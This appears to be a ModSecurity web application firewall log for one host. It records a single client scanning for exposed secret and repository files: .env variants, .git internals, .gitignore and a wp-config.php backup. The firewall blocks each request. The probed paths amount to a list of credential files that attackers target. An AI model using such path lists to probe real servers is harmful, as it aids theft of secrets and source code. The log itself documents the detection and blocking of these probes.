[Mon May 11 15:23:09.331152 2026] [security2:error] [pid 1319885:tid 1319892] [client 195.178.110.133:2530] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agHYPVchVQ3tCn0m9OpZCwAAAQQ"]
[Mon May 11 15:23:09.331366 2026] [security2:error] [pid 1319885:tid 1319892] [client 195.178.110.133:2530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agHYPVchVQ3tCn0m9OpZCwAAAQQ"]
[Mon May 11 15:23:09.331765 2026] [security2:error] [pid 1319885:tid 1319892] [client 195.178.110.133:2530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agHYPVchVQ3tCn0m9OpZCwAAAQQ"]
[Mon May 11 15:23:09.332145 2026] [security2:error] [pid 1319885:tid 1319898] [client 195.178.110.133:2574] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.tct-telecom.fr"] [uri "/.git/index"] [unique_id "agHYPVchVQ3tCn0m9OpZDAAAAQg"]
[Mon May 11 15:23:09.332287 2026] [security2:error] [pid 1319885:tid 1319898] [client 195.178.110.133:2574] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/.git/index"] [unique_id "agHYPVchVQ3tCn0m9OpZDAAAAQg"]
[Mon May 11 15:23:09.332854 2026] [security2:error] [pid 1319885:tid 1319898] [client 195.178.110.133:2574] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/.git/index"] [unique_id "agHYPVchVQ3tCn0m9OpZDAAAAQg"]
[Mon May 11 15:23:09.344671 2026] [security2:error] [pid 1320674:tid 1320706] [client 195.178.110.133:2652] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHYPaO9RdIr1DwxYR2SoQAAANE"]
[Mon May 11 15:23:09.344752 2026] [security2:error] [pid 1319953:tid 1319957] [client 195.178.110.133:2500] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agHYPeSQ-m-m0ukSShuB1wAAAUI"]
[Mon May 11 15:23:09.344789 2026] [security2:error] [pid 1320674:tid 1320706] [client 195.178.110.133:2652] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHYPaO9RdIr1DwxYR2SoQAAANE"]
[Mon May 11 15:23:09.344877 2026] [security2:error] [pid 1319953:tid 1319957] [client 195.178.110.133:2500] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agHYPeSQ-m-m0ukSShuB1wAAAUI"]
[Mon May 11 15:23:09.344952 2026] [security2:error] [pid 1319998:tid 1320001] [client 195.178.110.133:2642] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYPat2WtvoFr7xvGzUTwAAAIE"]
[Mon May 11 15:23:09.344972 2026] [security2:error] [pid 1320674:tid 1320706] [client 195.178.110.133:2652] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHYPaO9RdIr1DwxYR2SoQAAANE"]
[Mon May 11 15:23:09.345091 2026] [security2:error] [pid 1319998:tid 1320001] [client 195.178.110.133:2642] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYPat2WtvoFr7xvGzUTwAAAIE"]
[Mon May 11 15:23:09.345275 2026] [security2:error] [pid 1319953:tid 1319957] [client 195.178.110.133:2500] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agHYPeSQ-m-m0ukSShuB1wAAAUI"]
[Mon May 11 15:23:09.345341 2026] [security2:error] [pid 1319998:tid 1320001] [client 195.178.110.133:2642] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYPat2WtvoFr7xvGzUTwAAAIE"]
[Mon May 11 15:23:09.345396 2026] [security2:error] [pid 1320674:tid 1320707] [client 195.178.110.133:2492] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHYPaO9RdIr1DwxYR2SogAAANI"]
[Mon May 11 15:23:09.345511 2026] [security2:error] [pid 1320674:tid 1320707] [client 195.178.110.133:2492] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHYPaO9RdIr1DwxYR2SogAAANI"]
[Mon May 11 15:23:09.345692 2026] [security2:error] [pid 1320674:tid 1320707] [client 195.178.110.133:2492] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHYPaO9RdIr1DwxYR2SogAAANI"]
[Mon May 11 15:23:09.346245 2026] [security2:error] [pid 1319998:tid 1320012] [client 195.178.110.133:2636] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHYPat2WtvoFr7xvGzUUQAAAIw"]
[Mon May 11 15:23:09.346317 2026] [security2:error] [pid 1320398:tid 1320414] [client 195.178.110.133:2624] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agHYPeJEyNRN152ArOSMuAAAAE4"]
[Mon May 11 15:23:09.346366 2026] [security2:error] [pid 1319998:tid 1320012] [client 195.178.110.133:2636] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHYPat2WtvoFr7xvGzUUQAAAIw"]
[Mon May 11 15:23:09.346432 2026] [security2:error] [pid 1320398:tid 1320414] [client 195.178.110.133:2624] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agHYPeJEyNRN152ArOSMuAAAAE4"]
[Mon May 11 15:23:09.346551 2026] [security2:error] [pid 1319998:tid 1320012] [client 195.178.110.133:2636] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHYPat2WtvoFr7xvGzUUQAAAIw"]
[Mon May 11 15:23:09.346605 2026] [security2:error] [pid 1320398:tid 1320414] [client 195.178.110.133:2624] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agHYPeJEyNRN152ArOSMuAAAAE4"]
[Mon May 11 15:23:09.349192 2026] [security2:error] [pid 1320674:tid 1320708] [client 195.178.110.133:2544] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agHYPaO9RdIr1DwxYR2SowAAANM"]
[Mon May 11 15:23:09.349328 2026] [security2:error] [pid 1320674:tid 1320708] [client 195.178.110.133:2544] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agHYPaO9RdIr1DwxYR2SowAAANM"]
[Mon May 11 15:23:09.349568 2026] [security2:error] [pid 1320674:tid 1320708] [client 195.178.110.133:2544] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agHYPaO9RdIr1DwxYR2SowAAANM"]
[Mon May 11 15:23:09.351984 2026] [security2:error] [pid 1320398:tid 1320423] [client 195.178.110.133:2616] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agHYPeJEyNRN152ArOSMugAAAFc"]
[Mon May 11 15:23:09.352148 2026] [security2:error] [pid 1320398:tid 1320423] [client 195.178.110.133:2616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agHYPeJEyNRN152ArOSMugAAAFc"]
[Mon May 11 15:23:09.352502 2026] [security2:error] [pid 1320398:tid 1320423] [client 195.178.110.133:2616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agHYPeJEyNRN152ArOSMugAAAFc"]
[Mon May 11 15:23:09.361993 2026] [security2:error] [pid 1319998:tid 1320001] [client 195.178.110.133:2642] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYPat2WtvoFr7xvGzUUgAAAIE"]
[Mon May 11 15:23:09.362106 2026] [security2:error] [pid 1319998:tid 1320001] [client 195.178.110.133:2642] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYPat2WtvoFr7xvGzUUgAAAIE"]
[Mon May 11 15:23:09.362336 2026] [security2:error] [pid 1319998:tid 1320001] [client 195.178.110.133:2642] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYPat2WtvoFr7xvGzUUgAAAIE"]
[Mon May 11 15:23:09.364473 2026] [security2:error] [pid 1320674:tid 1320707] [client 195.178.110.133:2492] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agHYPaO9RdIr1DwxYR2SpQAAANI"]
[Mon May 11 15:23:09.364589 2026] [security2:error] [pid 1320674:tid 1320707] [client 195.178.110.133:2492] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agHYPaO9RdIr1DwxYR2SpQAAANI"]
[Mon May 11 15:23:09.364760 2026] [security2:error] [pid 1320674:tid 1320707] [client 195.178.110.133:2492] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agHYPaO9RdIr1DwxYR2SpQAAANI"]
[Mon May 11 15:23:09.364411 2026] [security2:error] [pid 1319953:tid 1319965] [client 195.178.110.133:2554] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agHYPeSQ-m-m0ukSShuB2gAAAUo"]
[Mon May 11 15:23:09.365083 2026] [security2:error] [pid 1319953:tid 1319965] [client 195.178.110.133:2554] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agHYPeSQ-m-m0ukSShuB2gAAAUo"]
[Mon May 11 15:23:09.365278 2026] [security2:error] [pid 1319953:tid 1319965] [client 195.178.110.133:2554] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agHYPeSQ-m-m0ukSShuB2gAAAUo"]
